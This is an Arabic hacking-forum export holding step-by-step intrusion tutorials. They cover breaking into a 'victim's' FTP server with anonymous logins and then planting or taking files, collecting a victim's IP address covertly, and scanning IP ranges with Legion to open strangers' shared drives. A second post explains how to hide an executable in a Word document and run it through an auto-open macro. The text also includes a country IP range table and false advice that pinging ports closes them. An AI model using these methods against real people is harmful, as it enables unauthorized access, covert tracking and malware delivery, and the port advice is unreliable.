وهو ارسال الملفات من الكمبيوتر المحلي Local الى الكمبيوتر المضيف Host. <br />
<br />
ومن الناحية الأمنية فهناك نوعان لنقل الملفات: <br />
<br />
نقل مؤمن Secure FTP: <br />
<br />
<br />
تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل عليه من مدير النظام المضيف. <br />
<br />
<br />
نقل مجهول Anonymous FTP: <br />
<br />
<br />
لاتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطيع غالباً استخدام guest أو anonymous عوضاً عنهما. <br />
<br />
تصنف مصادر البرامج على الانترنت الى ثلاثة أقسام: <br />
<br />
ملكية عامة Public Domain: <br />
<br />
<br />
وضعت البرامج هنا للاستخدام العام فليس هناك حقوق ملكية لأحد ولا قيود على استخدامها وتوزيعها وتعديلها. <br />
<br />
<br />
مصادر مجانية Freeware: <br />
<br />
<br />
يحق للجميع استخدام هذه البرامج أو توزيعها ولكن هناك حقوق ملكية ونشر ولا يجوز تعديلها أو بيعها. <br />
<br />
<br />
مصادر مشتركة Shareware: <br />
<br />
<br />
يتم توزيع هذه البرامج بغرض التجربة قبل الشراء وقد لاتتضمن جميع المميزات ويجب تحطيم النسخ بعد انتهاء مدتها. <br />
<br />
FTP والفيروسات: <br />
<br />
<br />
يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمين: <br />
<br />
<br />
ASCII: <br />
<br />
<br />
اختصاراً لـ(American Standard Code for Information Interchange) والملفات من هذا النوع تحتوي على سبعة جزيئات bits تتراوح قيمتها بين الصفر و 127. ويستخدم هذا المصطلح للتعبير عن المعيار الذي يقوم بتحويل الأحرف الى أرقام في الكمبيوتر. وتستخدم الملفات النصية هذا النوع من الصيغ. <br />
<br />
<br />
Binary: <br />
<br />
<br />
وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانية جزيئات bits تتراوح بين الصفر و 255 وتندرج الصور والبرامج والملفات المضغوطة تحت هذا النوع. <br />
<br />
والفيروسات لا يمكن أن تنتقل عبر ملفات ASCII كما لايمكن أن تنتقل عبر الصور كصيغ jpg &amp; gif &amp; bmp وغيرها من امتدادات الصور ولا عبر ملفات الفيديو والصوت مثل avi - ram - mpg - mp3 - wav وغيرها، وبمعنى آخر فانها تنتقل عبر البرامج وملفات النظام والتشغيل والبرامج المضغوطة وعادة ماتكون: exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - b64 - bhx، كما يمكن أن تنتقل فيروسات الماكرو عبر تطبيقات MS Office، لذلك احذر من هذه الملفات وافحصها دائماً قبل تشغيلها. <br />
<br />
طريقة نقل الملفات FTP: <br />
<br />
هناك طرق عديدة لنقل الملفات وهي: <br />
<br />
نقل الملفات باستخدام نظام UNIX <br />
<br />
<br />
تتطلب هذه العملية عادة استخدام أوامر وهاهنا بعض أوامر UNIX: <br />
<br />
<br />
<br />
ascii: لنقل ملفات ASCII النصية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر. <br />
<br />
binary: لنقل الملفات الثنائية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر. <br />
<br />
status: لفحص الملف ومعرفة هل هو من نوع ASCII أو Binary. <br />
<br />
help: لعرض قائمة بأوامر UNIX. <br />
<br />
dir: عرض محتويات الدليل <br />
<br />
ls: عرض محتويات الدليل الحالي. <br />
<br />
cd directory: تغيير الدليل. <br />
<br />
get filename: جلب الملف المطلوب وانزاله على جهازك. <br />
<br />
mget filename:جلب مجموعة من الملفات. <br />
<br />
pwd: طباعة الدليل الحالي. <br />
<br />
bye: انهاء الارتباط والخروج من النظام البعيد. <br />
<br />
<br />
<br />
نقل الملفات باستخدام حساب Shell: <br />
<br />
أول ماتفعله في هذا النوع من نقل الملفات هو ادخال الملقن الخاص بشركة توفير الخدمة فمثلاً سوف تدخل حسابك في Tripod عن طريق Unix Shell، نكتب أولاً الأمر ftp متبوعاً بالوجهة المرادة فيصبح: ftp ftp.tripod.com ثم ندخل الاسم وهو عل سبيل المثال &quot;IronPrivate&quot;، ثم نقوم بادخال الرقم السري وهو مثلاً &quot;******&quot;. وبعد الدخول الى الحساب يمكنك استخدام نفس أوامر Unix المعتادة. <br />
<br />
نقل الملفات باستخدام المتصفح Browser: <br />
<br />
نقل الملفات عن طريق المتصفحات سهل جداً فما عليك سوى ادخال عنوان الموقع URL ويبدأ العنوان بكلمة //tp ثم العنوان بدلاً من كلمة //:http للعناوين العادية، بعد الدخول الى موقع الـFTP ستأتي الصفحة عبارة عن ملفات ومجلدات وماعليك سوى النقر على الملف المطلوب لانزاله. <br />
<br />
نقل الملفات باستخدام حساب SLIP/PPP: <br />
<br />
أفضل استخدامات هذا النوع من الربط أنها تسمح لنا باستخدام برامج تابعة Client Programs. وأفضل برنامج تابع يمكن استخدامه للنوافذ Windows هو برنامج Ws_ftp. <br />
<br />
- استخدام برنامج Ws_ftp LE 5.06: <br />
<br />
ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج، سيظهر لك مربع حوار Session Profile والذي من خلاله تقوم بتسجيل الدخول، اكتب في خانة Profile Name اسم حساب الدخول؛ على سبيل المثال My Home Page In Tripod واكتب في خانة Host Name اسم الملقن وفي هذا المثال هو ftp.tripod.com ثم في خانة Host Type اختر Auto Detect لكي يقوم بالتدقيق التلقائي في نوع نظام الجهاز المضيف، بعد ذلك قم بكتابة الاسم في خانة User ID وهو مثلاً IronPrivate ثم الرقم السري في خانة Password وسيظهر مخفياً على هيئة نجوم ******, ثم اضغط OK. <br />
<br />
_-_Bonz0_-_ 04-18-2004 09:21 PM <br />
<br />
--------------------------------------------------------------------------------<br />
<br />
<br />
نقل الملفات باستخدام الاتصال الشبكي البعيد Telnet: <br />
<br />
Telnet هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر مضيف جاعلاً جهازه وكأنه جزء من ذلك الكمبيوتر البعيد. ويختلف العرض حسب نظام الكمبيوتر المضيف. اذا كان الجهاز البعيد يستخدم نظام Windows فلا مشكلة أما اذا كان يستخدم نظام آخر فيجب معرفة بعض الأوامر للتحكم وأهم أمر يجب أن تعرفه هو &quot;؟&quot; والذي يحضر لك قائمة بالأوامر اللازمة. <br />
<br />
استخدام برنامج Telnet من Windows: <br />
<br />
ترفق Windows برنامجاً سهلاً يسمى Telnet يمكنك الدخول عليه بالضغط على قائمة ابدأ Start ثم تشغيل Run ثم اكتب Telnet وستنفتح لك صفحة البدء للبرنامج.. من Connect اختر Remote System. في صندوق الحوار Connect الذي سيظهر لك اكتب في خانة Host Name اسم ملقن الجهاز المضيف ثم اكتب في خانة Port الميناء أو المنفذ ( اذا كان لديك) او اتركه كما هو، ثم اختر من الـTerm Type ، ان كان لديك والا قم بالتجربة. بعد ذلك اضغط Connect وعندما يتم الربط فستحتاج لادخال الاسم والرقم السري. وبعد الانتهاء من النقل اخترDisconnect من قائمة Connect وبعد ذلك اختر Exit. <br />
<br />
========= <br />
<br />
الاختراق : <br />
<br />
======= <br />
<br />
FTP <br />
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البور <br />
21 <br />
مفتوح و هو البور الخاص ب <br />
FTP <br />
و لتأكد من أن البور مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها <br />
<br />
<br />
Superscanne <br />
<br />
<br />
بعدما تتأكد ان البور مفتوح ننتقل الى الخطوة الثانية و هي <br />
إضغط على <br />
Start <br />
ثم <br />
Run <br />
ثم اكتب <br />
ftp –n <br />
سوف تطلع لك نافدة في الدوس مكتوب عليها <br />
FTP&gt; <br />
ؤوكي لحد هنا كل شيء تمام <br />
و بعدين اكتب <br />
Open <br />
ثم إضغط على <br />
إدخال <br />
Enter <br />
سوف تتحصل عب النتيجة التالية <br />
FTP&gt; <br />
To <br />
أكتب بجانب <br />
To <br />
رقم الإبي للضحية ثم إضغط على إدخال <br />
و الآن خد بالك معي <br />
<br />
إدا تحصلت على هدا الرد فقد تخطيت خطوة <br />
<br />
<br />
Connected to <a href="http://www.assassin.com/" target="_blank">http://www.assassin.com/</a> <br />
220 websrv1 Microsoft FTP Service (Version 4.0). <br />
<br />
<br />
و الآن أكتب الكتابة التالية <br />
<br />
<br />
ftp&gt;quote user ftp <br />
<br />
<br />
إدا تحصلت على هدا الرد فقد تخطيت خطوة <br />
<br />
<br />
331 Anonymous acces allowed, send identify (e-mail name) as password. <br />
<br />
<br />
و الآن أكتب الكتابة التالية <br />
<br />
<br />
ftp&gt;quote cwd ~root <br />
<br />
<br />
إذا تحصلت على هدا الرد فقد تخطيت خطوة <br />
<br />
<br />
530 Please login with USER and PASS <br />
<br />
<br />
ثم أكتب الكتابة التالية <br />
<br />
<br />
ftp&gt;quote pass ftp <br />
<br />
<br />
إدا تحصلت على هدا الرد فقد تخطيت خطوة <br />
و نجحت في الإقتحام <br />
<br />
230 Anonymous user logged in. <br />
<br />
<br />
مبروك أنت الآن في جهاز الضحية <br />
ما عليك الآن الا ان تقوم بإستعمال <br />
اوامر الف تي بي <br />
<br />
<br />
هذه هى اوامر الاف تى بى مبسطة لاستخدامها فى نقل ملفات من و الى الضحية و غير ذلك <br />
<br />
<br />
Pwd <br />
<br />
<br />
لكي تعر ما يحتويه الهارد ديسك <br />
<br />
<br />
Cd <br />
<br />
<br />
لإقتحام مجلد مثال <br />
<br />
<br />
Cd black <br />
في هدا المثال قمت بإقتحام مجلد المسمى بلاك <br />
<br />
Ls <br />
لكي يتضح لك محتوى المجلد أو الهارد ديسك <br />
<br />
Get <br />
لكي تحمل الى سطح المكتب بتاع جهازك <br />
مثال <br />
Get black.exe<br />
<br />
<br />
Put <br />
العملية الع**ية ل Get <br />
<br />
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في <br />
في جهاز الضحية <br />
مثال <br />
Put black.exe <br />
<br />
Clos <br />
لقطع الإتصال مع الضحية<br />
<br />
رقام ايبيهات الدول<br />
<br />
الكاتب : لا اعرف<br />
<br />
<br />
<br />
Egypt 62.135.127.255 62.135.0.0 <br />
Bahrain 193.188.127.255 193.188.96.0 <br />
Oman 212.72.31.255 212.72.0.0 <br />
United Arab Emirates 217.165.255.255 217.164.0.0 <br />
United Arab Emirates 195.229.255.255 195.229.0.0 <br />
United Arab Emirates 194.170.255.255 194.170.0.0 <br />
United Arab Emirates 213.42.255.255 213.42.0.0 <br />
Jordan 212.118.31.255 212.118.0.0 <br />
Jordan 217.23.47.255 217.23.32.0 <br />
Jordan 194.165.159.255 194.165.128.0 <br />
Jordan 193.188.95.255 193.188.64.0 <br />
Saudi Arabia 62.3.63.255 62.3.0.0 <br />
Saudi Arabia 212.2.255.255 212.2.224.0 <br />
Saudi Arabia 213.238.31.255 213.238.0.0 <br />
Saudi Arabia 213.184.191.255 213.184.160.0 <br />
Saudi Arabia 212.93.223.255 212.93.192.0 <br />
Saudi Arabia 212.70.63.255 212.70.32.0 <br />
Saudi Arabia 217.8.79.255 217.8.64.0 <br />
Saudi Arabia 213.165.63.255 213.165.32.0 <br />
Saudi Arabia 212.102.31.255 212.102.0.0 <br />
Saudi Arabia 213.230.31.255 213.230.0.0 <br />
Saudi Arabia 212.33.191.255 212.33.160.0 <br />
Saudi Arabia 212.26.127.255 212.26.0.0 <br />
Lebanon 62.84.95.255 62.84.64.0 <br />
Kuwait 62.215.255.255 62.215.0.0 <br />
Kuwait 195.226.255.255 195.226.224.0 <br />
Kuwait 195.39.191.255 195.39.128.0 <br />
Kuwait 62.100.223.255 62.100.192.0 <br />
Kuwait 194.126.63.255 194.126.32.0 <br />
Kuwait 194.54.255.255 194.54.192.0 <br />
Kuwait 213.189.95.255 213.189.64.0 <br />
Kuwait 62.150.255.255 62.150.0.0 <br />
Malaysia 210.186.127.255 210.186.0.0 <br />
Iceland 217.9.143.255 217.9.128.0 <br />
Portugal 213.13.255.255 213.13.0.0 <br />
Pakistan 203.135.63.255 203.135.32.0 <br />
Denmark 62.135.255.255 62.135.128.0 <br />
Ukraine 217.9.15.255 217.9.0.0 <br />
Russian Federation 62.5.255.255 62.5.128.0 <br />
Russian Federation 212.118.63.255 212.118.32.0 <br />
Japan 61.21.255.255 61.21.0.0 <br />
India 61.1.255.255 61.0.0.0 <br />
Poland 213.17.255.255 213.17.128.0 <br />
Poland 217.9.175.255 217.9.160.0 <br />
Poland 217.9.191.255 217.9.176.0 <br />
Lithuania 217.9.255.255 217.9.240.0 <br />
Hungary 213.16.127.255 213.16.64.0 <br />
Turkey 213.14.255.255 213.14.0.0 <br />
Turkey 62.248.127.255 62.248.0.0 <br />
Turkey 195.175.255.255 195.174.0.0 <br />
Sweden 213.15.255.255 213.15.0.0 <br />
Sweden 62.5.127.255 62.5.0.0 <br />
France 213.11.255.255 213.11.0.0 <br />
France 80.15.255.255 80.8.0.0 <br />
France 213.16.31.255 213.16.0.0 <br />
France 213.19.127.255 213.19.0.0 <br />
Bulgaria 213.16.63.255 213.16.32.0 <br />
Switzerland 213.230.63.255 213.230.32.0 <br />
Switzerland 213.3.255.255 213.3.0.0 <br />
Great Britain 213.230.127.255 213.230.64.0 <br />
Great Britain 212.106.63.255 212.106.32.0 <br />
Great Britain 62.3.127.255 62.3.64.0 <br />
Great Britain 213.12.255.255 213.12.0.0 <br />
Great Britain 213.18.255.255 213.18.0.0 <br />
Great Britain 213.230.255.255 213.230.192.0 <br />
Great Britain 213.1.255.255 213.1.0.0 <br />
Great Britain 213.2.255.255 213.2.0.0 <br />
Italy 213.230.159.255 213.230.128.0 <br />
Italy 213.21.191.255 213.21.128.0 <br />
Italy 62.152.159.255 62.152.128.0 <br />
Norway 213.230.191.255 213.230.160.0 <br />
Netherlands 213.10.255.255 213.10.0.0 <br />
Netherlands 213.17.127.255 213.17.0.0 <br />
Netherlands 24.132.255.255 24.132.0.0 <br />
Netherlands 213.19.255.255 213.19.128.0 <br />
Greece 213.5.255.255 213.5.0.0 <br />
Greece 213.16.255.255 213.16.128.0 <br />
Germany 213.7.255.255 213.6.0.0 <br />
Germany 62.84.63.255 62.84.32.0 <br />
Germany 213.20.255.255 213.20.0.0 <br />
Germany 213.21.127.255 213.21.0.0 <br />
Germany 213.9.127.255 213.9.0.0 <br />
Israel 213.8.255.255 213.8.0.0 <br />
Israel 80.230.255.255 80.230.0.0 <br />
Israel 192.118.7.255 192.118.4.0 <br />
Israel 192.118.11.255 192.118.8.0 <br />
Israel 212.179.255.255 212.179.0.0 <br />
Israel 192.118.15.255 192.118.12.0 <br />
Israel 212.116.191.255 212.116.160.0 <br />
Israel 212.199.255.255 212.199.0.0 <br />
Israel 213.189.63.255 213.189.32.0 <br />
Israel 213.8.255.255 213.8.0.0 <br />
Philippines 203.215.95.255 203.215.64.0 <br />
Spain 213.9.255.255 213.9.128.0 <br />
Spain 62.151.255.255 62.151.0.0  <br />
      <br />
للفائده يااخواني <br />
ولا تسيئون الاستخدام<br />
<br />
<br />
<br />
<br />
هنا طريقة معرفة الـ IP للضحية<br />
<br />
====== <br />
<br />
<br />
الطريقة الأولى استخراج ايبي الضحيه من خلال الماسنجر <br />
----------------------------------- <br />
<br />
في البداية أرسل للضحيه اي ملف او صورة او اي شيء <br />
<br />
وبعد ما توصل بنجاح <br />
<br />
تروح تفتح الدوس وطريقه فتحه كالآتي <br />
<br />
تروح لــــ START ثم RUN وتكتب command أو Dosprmpt <br />
<br />
بعد ماتفتح شاشه الدوس السوداء <br />
<br />
تكتب هذا الأمر netstat -n <br />
<br />
مع ملاحظة المسافة بين الشرطة و الكلمة netstat -n <br />
<br />
بعد كتابه الأمر يطلعك الشكل الأتي :- <br />
<br />
Proto -- Local Address -- Foreign Addres -- State <br />
<br />
<br />
Local Address هذا رقم الاي بي الخاص بيك انت <br />
Foreign Address هنا تحصل رقم الاي بي حق الضحية اخر رقم فيهم <br />
ٍState بتلاقي مكتوب قدام رقم الاي بي حق الضحيه اللي هو اخر واحد في Foreign Address تلاقي مكتوب TIME_WAIT <br />
وبكده تكون انت عرفت رقم الاي بتاعك ورقم الاي بي للضحيه في نفس الوقت <br />
بس <br />
<br />
الطريقة الثانيه من خلال الماسنجير <br />
======================= <br />
من خلال هذا الرابط<br />
<a href="http://www.geocities.com/mondysite/mesn.zip" target="_blank">http://www.geocities.com/mondysite/mesn.zip</a> <br />
<br />
طريقة البرنامج <br />
<br />
افتحه بيجيك مربع فوق على يسار اكتب فيه رقم الآي بي الخاص بك<br />
<br />
بعدين اظغط الزر اللي تحته <br />
<br />
convert IP address <br />
<br />
بعدين اظغط على الزر Listen <br />
<br />
بيجيك وصله تحت تلقاها رقم طويل انسخها وعطها اللي قاعد تكلمه في الماسنجر <br />
<br />
وانتظر شوي بيجيك رقم الآي بي الخاص به في الجهه اليمنى <br />
<br />
وبكذا تكون وفرت على نفسك ارسال اي ملفات <br />
<br />
================================================= <br />
<br />
<br />
الطريقة الثالثة <br />
=========== <br />
بدون تحميل برامج او اي شي اذا عندك برنامج جدار نار مثــل Fire Wall - <br />
<br />
ZONE ALARM - BLACK ICE <br />
<br />
1-تجيب الIP الخاص بك ثم <br />
<br />
2- تكتب الIP الخاص بك بالشكل هذا <br />
<br />
http:// 212.34.34.78 <br />
<br />
3- طبعا الارقام الي فوق افتراضية <br />
<br />
4- بعد ما تحول الIP الخاص بيك لصورة لينك او وصلة تطلب من الضحيه <br />
<br />
الضغط عليه <br />
<br />
5- الباحث اللى عند الضحيه راح يدفعه ناحيتك ناحيه اتصال جهازك بالنت <br />
<br />
6- برنامج الف*** وول راح يعطيك اشاره انك متعرض لمحاولة اختراق من هذا الشخص ويعطيك رقم الأي بيه الخاص به بكل سهوله <br />
<br />
================================================= <br />
<br />
الطريقة الرابعة عن طريق الإيميل <br />
====================== <br />
تروح تبعت للشخص اللي انت تبي تعرف الاي بي حقه اي ايميل من عندك وانت تكتب الايميل تزود عليه الامر <br />
confirm.TO <br />
يعني اذا فرضنا بريد الي تبي ترسل له <br />
<br />
ali************* <br />
<br />
يصير تضيف بعد عنوان البريدهذا الامر كانك تكتب الايميل يشكل العادي بهالشكل <br />
<br />
ali*************.confirm.TO <br />
<br />
وبهذت لما هو يفتح الرساله تجيك انت رساله تعلمك انه فتح رسالتك بنفس اللحظه الي هو فتحها وهو طبعا رقم الاي بي الخاص به <br />
وطبعا هو ما راح يعرف <br />
<br />
================================================== <br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
========= <br />
<br />
الطريقة الخامسة عن طريق الإيميل ايضا <br />
=========================== <br />
<br />
لنفرض ان احدا ارسل لك رساله وتريد أن تعرف الــIP حقه من رسالته في ((HOTMAIL)) <br />
<br />
<br />
من بريد الــHOTMAIL أختر options <br />
<br />
بعدين اختر Mail Display Settings <br />
<br />
بعدين massage headers <br />
<br />
وغير الاختيار الى advanced <br />
<br />
الحين رح لأي رسالة بتلقى IP لصاحب هذه الرسالة <br />
<br />
وبعض المعلومات الأخرى <br />
================================================== <br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
============ <br />
<br />
الطريقة السادسة عن طريق برنامج ICQ <br />
========================== <br />
هناك طرق كثيرة لمعرف ال IP من خلال البرنامج اسهلها من خلال هذا البرنامج <br />
<br />
<a href="http://www.geocities.com/mondysite/ICQ_IP.zip" target="_blank">http://www.geocities.com/mondysite/ICQ_IP.zip</a> <br />
<br />
تفتحه مع الأي سي كيو بعدين راح يحفظ البرنامج TXT فاضي في مكان انت تحدده <br />
<br />
وبعدين عندما يكون احد متصل معاك على البرنامج تفتح TXT تلاقي رقم الأي سي كيو واسمه ورقم الأي بي حقه <br />
<br />
هذه اسهل طريقة <br />
<br />
================================================== <br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
============= <br />
<br />
الطريقة السابعة اظهار رقم ال IP للمواقع <br />
========================== <br />
<br />
تقوم تفتح شاشه الدوس وتكتب الأمر التالي <br />
<br />
<br />
ping -wwww.xxxxxxxxx.com <br />
<br />
ومكان xxxxxxx تحط اسم الموقع <br />
<br />
هاذي الطريقه تطلع IP الموقع  <br />
      <br />
<br />
من منكم و صل الى مرحلة الاخترق من دون باتش القليل فقط <br />
<br />
رغم انها سهلة جداً طبعاً هذا درس صغير لتعليمك و هو جزء من اجزاء كثير نبداء <br />
<br />
بسم الله الرحمن الرحيم <br />
<br />
الأختراق بدون باتش و الحماية منه <br />
<br />
هذه الطريقة تسمى طريقه المشاركة في الملفات والطابعة. <br />
<br />
و لكن قبل بدء الاختراق يجب ان يتوافر شرط واحد لبدء الاختراق و هو <br />
<br />
يجب أن يكون على نظامك عميل يسمى . Microsoft Networks <br />
<br />
و طريقة اضافته كالتالى: <br />
<br />
اضغط على زر ابدأ START <br />
<br />
ومن ثم إعدادات . Settings <br />
<br />
ومن ثم لوحة التحكم . Control Panel <br />
<br />
ومن ثم بالنقر على أيقونة شبكات . Networks <br />
<br />
سوف تظهر معك شاشة الاضافه ، اضغط على كلمة عميل . Client <br />
<br />
ستظهر معك شاشة اختيار نوع العميل الذي تريد اضافته ، اضغط على شركة Microsoft<br />
<br />
ومن ثم اختر العميل Client for Microsoft Networks <br />
<br />
ومن ثم اضغظ موافق ، بعدها سيطلب منك ادخال قرص الويندوز<br />
<br />
لتحميل بعض الملفات وبعدها يطلب منك اعادة التشغيل ، اختر لا لكي لا يعيد النظام التشغيل . <br />
<br />
سترجع الى شاشة اعداد الشبكات مرة اخرى ، اضغط على زر مشاركة بالملفات الطابعة . <br />
<br />
ضع صح على كل من : <br />
<br />
اريد أن اكون قادرا على إعطاء الاخرين حق الوصول الى ملفاتي.<br />
<br />
I want to be able to give others access my files <br />
<br />
اريد أن اكون قادرا على السماح للآخرين بالطباعة على طابعتي . <br />
<br />
I want to be able to allow to others to print on my printers <br />
<br />
· اضغط علىموافق ، وبهدها أغلق اعدادات الشبكة . <br />
<br />
· سترجع الى شاشة لوحة التحكم ، اضغط على ايقونة كلمات المرور ( احمر Passwords ) <br />
<br />
· ستظهر معك شاشة كلمات السر ، قم انقر على ايقونه Remote Administration . <br />
<br />
· ضع علامه صح على Enable remote administration of this server <br />
<br />
<br />
وبعدها ادخل أي كلمة سرية مرتين ومن ثم موافق <br />
<br />
. الغرض من هذه الخطوة كي لا يتمكن أحد من الوصول الى ملفاتك وطابعتك الا بالكلمة السرية التي أنت وضعتها <br />
<br />
الان حققت الشرط الازم للاختراق وبقي عليك الطريقة لكي تصل الى ملفات غيرك على الانترنت . <br />
<br />
==&gt; الاختراق &lt;== <br />
<br />
اولا يجب عليك تحميل البرنامج المستخدم و هو Legion <br />
<br />
(ملاحظة : البرنامج ليس لدى الان ولكن تستطيع البحث عنه في جوجول ) <br />
<br />
بعد تشغيلك للبرنامج سوف يظهر لك قائمتين . القائمة اليسرى يظهر لك أرقام الايبي<br />
<br />
المصطاده والقائمة اليمنى يعرض لك فيها بيانات كل ايبي وماهي السواقات والطابعات<br />
<br />
المشاركة وفي الاعلى هناك 4 مربعات فارغة لك تطلب منك ادخال المدى <br />
<br />
الذي تريد البحث فيه ، على سبيل المثال نريد البحث في المدى 212.64.130.1 <br />
<br />
. بعد ان تملى المربعات اضغط على زر scan لكي تبدأ البحث <br />
<br />
سوف يبدأ البرنامج في البحث وسوف يظهر لك ارقام الايبي التي حصل عليها في<br />
<br />
القائمة اليسرى ، وبعد ان ينتهي من البحث سوف يقوم بفحص كل ايبي حصل<br />
<br />
عليه لكي يظهر لك ما بداخل كل ايبي من سواقات وطابعات ومشاركة ، وسوف يضعها لك في القائمة اليمنى . <br />
<br />
فلنفرض أنه اصطاد سواقات على احدى ارقام الايبي عندها سيعرض لك البيانات كالمثال التالي : <br />
<br />
Shared resources at //212.64.130.55 <br />
<br />
Sharename Type Comment <br />
<br />
ــــــــــــــــــــــــــــــــــــــــــــــــــ <br />
ــــــــ <br />
<br />
ATL OPS STUF Disk <br />
<br />
C Disk <br />
<br />
DC ROM Disk <br />
<br />
DC STUFF DISK <br />
<br />
FMPRO Disk <br />
<br />
JW STUFF Disk <br />
<br />
The command was completed successfully . <br />
<br />
<br />
اذا ظهرت لك بيانات على أي رقم كالبيانات السابقة انسخ رقم الايبي . <br />
<br />
بعدها اضغط على زر ابدأ . (START) <br />
<br />
اختر تشغيل . (RUN) <br />
<br />
ثم اكتب رقم الايبي <br />
<br />
ــــــــــــــــــــــــــــــــــــــــــــــــــ <br />
ـــــــــــ <br />
<br />
عندها سوف يفتح لك نافذه كنافذه المستكشف (Explorer)<br />
<br />
ويضع فيها سواقات الجهاز الذي أنت بداخلة الآن ، اختر أي سواقة تريد . <br />
<br />
==&gt; كيف تحمي نفسك من الاختراق &lt;== <br />
<br />
اذا كنت مبتدء وتريد حمايه جهازك وملفاتك على الانترنت من هذه الطريقه فامسح العميل <br />
<br />
Microsoft Network من اعدادات الشبكة ، وسوف يكون جهازك بامان تام ان شاء الله  <br />
      <br />
امنع اى شخص من الدخول الى جهازك عبر الدوس <br />
<br />
<br />
بسم الله الرحمن الرحيم <br />
<br />
هتقفل جميع البورتات ال على الجهاز بتاعك <br />
<br />
اولاا قم بفتح الدوس <br />
<br />
اولاا ستار<br />
تانى حاجه رن <br />
تالت شى command<br />
<br />
قم بالاتى <br />
<br />
اول شى قم بكتابت الاتى <br />
<br />
ping host<br />
<br />
تانى شى <br />
<br />
ping port80<br />
تالت شى <br />
ping port139<br />
رابع شى <br />
ping port23<br />
خامس شى <br />
ping host<br />
ولحظ كدا مفيش اى شى يقدر <br />
يخش من الدوس  <br />
      </div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>ssamad2006</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=29263</guid>
		</item>
		<item>
			<title>ضع السيرفر او الباتش فى ملف وورد و اخدع اى شخص و ان كان اخطر المخترقين</title>
			<link>https://kwety.net/vb/showthread.php?t=29262&amp;goto=newpost</link>
			<pubDate>Sun, 03 Sep 2006 13:48:21 GMT</pubDate>
			<description>ضع السيرفر او الباتش فى ملف وورد و اخدع اى شخص و ان كان اخطر المخترقين 


--------------------------------------------------------------------------------

هدفي من طرح الموضوع هو ان يعرف الجميع مدى خطورة ملفات xxx.doc ملفات الوورد الي في الانترنت ويتفادونها وراح اشرح لكم طريقة عمل هذه الطريقة 



DOC وورد خطره لأنه بالامكان ادخال ملف exe فيها كا كائن او object و امكانيه اخفائه بكل سهوله في DOC.و تشغيل الملف ال exe بكل سهوله لما يفتح DOC ... و أيضاُ امكانيه تنفيذه بشروط كاعمل نسخه من الملف تحت السيستم و تحديد وقت لتشغيلها ..الخ .... 

المهم انا بشرح كيف إضافة ملف exe في الورد كاعنصر كائن مخفي بالورد DOC ....و كيفيه تشغيله من دون معرفه الشخص.....: 

1- افتح الورد على مستند جديد . 
2- Insert ادراج. 
3- Object كائن. 
4- و لما تطلع القائمه اختار منها Package حزمه. 
5- الان يفتح معاك object Packager او معد الحزم. 
6- اختار file ملف. 
7- و بعدين import استيراد. 
8- الان اختار اي ملف exe تبي تنزله في للمستند. 
9- و بعد ما تختاره راح يطلع الملف عندك في مربع معد الحزم object packager 
10- اذهب الى ملف file و اختار تحديث update. 

الان راح تشوف ملف ال exe موجود في مستند الورد ...كا كائن ملصق بالمستند ...لو تطق عليه دبل كلك راح يشتغل عادي ....لكن انت تبي الشخص ما يشوفه و يشتغل اوتوماتك: 

1- طيب حدد الملف او خله عنصر نشط. 
2- من ثم اذهب الى Format ثم Object 
3- إختار بالزر اليمين ثم إختار Format Object 
4- و من ثم اذهب الى size او الحجم و خله صفر. 
5- بهذه الخطوات لا تستطيع أن تشاهد الملف المرفق مع ملف الوورد. 

الحين يبقى اضافه اوامر برمجيه بالمستند لتشغيل الملف عند فتح ملف الوورد: 
1- أدوات tools 
2- ماكرو macro 
3- Microsoft Visual Basic Editor 
4- تنفتح صفحة الإستعراض المشروع. 
5- أضغط مرتين على this ******** 
6- و من ثم في القائمه المسندله فوق صفح العمل غير الخيار من Generalالى ******** 
7- و القائمه المسندله الاخر من new الى open 
8- و اكتب الكود الذي يقوم بتشغيل object الكائن المرفق بالمستند ...يجب كتابته بين 

Private Sub ******** Open () 
** هناااااااااااااا تكتب الكود الذي ينفذ ال object* 
End Sub 

لكتابة الكود لا بد أن تكون عندك خلفية مبرمجية 

ممكن يرسل لك ملف EXE داخل ملف DOC ويكون فيه Virus يعدم الدنيا لكن ابي ازيدك من الشعر بيت، لان ممكن ملف الـ DOC يكون فيه Virus منشى من لغة VBA ففي بعض الاحيان لما تفتح ملفات DOC تطلع لك رسالة تقول لك ان الملف هذا يحتوي على Macros ومع زرين Yes و No هل تبغى تفتحها؟؟؟؟ وهذا على مسؤوليتك انت.. 

لذلك يتضح أن ملفات الوورد ليست أمنه ولكنها أشد خطورة لعدم معرفة الناس بخطورتها لانه عندما تسأل أي أحد يقول لك لاتستقبل برامج به EXE. ولكن مكمن الخطر في الوورد او الصور أشد إذا أراد أحد الأذية ولكن أقول الحذر الحذر



الموضوووووووع منقوول</description>
			<content:encoded><![CDATA[<div>ضع السيرفر او الباتش فى ملف وورد و اخدع اى شخص و ان كان اخطر المخترقين <br />
<br />
<br />
--------------------------------------------------------------------------------<br />
<br />
هدفي من طرح الموضوع هو ان يعرف الجميع مدى خطورة ملفات xxx.doc ملفات الوورد الي في الانترنت ويتفادونها وراح اشرح لكم طريقة عمل هذه الطريقة <br />
<br />
<br />
<br />
DOC وورد خطره لأنه بالامكان ادخال ملف exe فيها كا كائن او object و امكانيه اخفائه بكل سهوله في DOC.و تشغيل الملف ال exe بكل سهوله لما يفتح DOC ... و أيضاُ امكانيه تنفيذه بشروط كاعمل نسخه من الملف تحت السيستم و تحديد وقت لتشغيلها ..الخ .... <br />
<br />
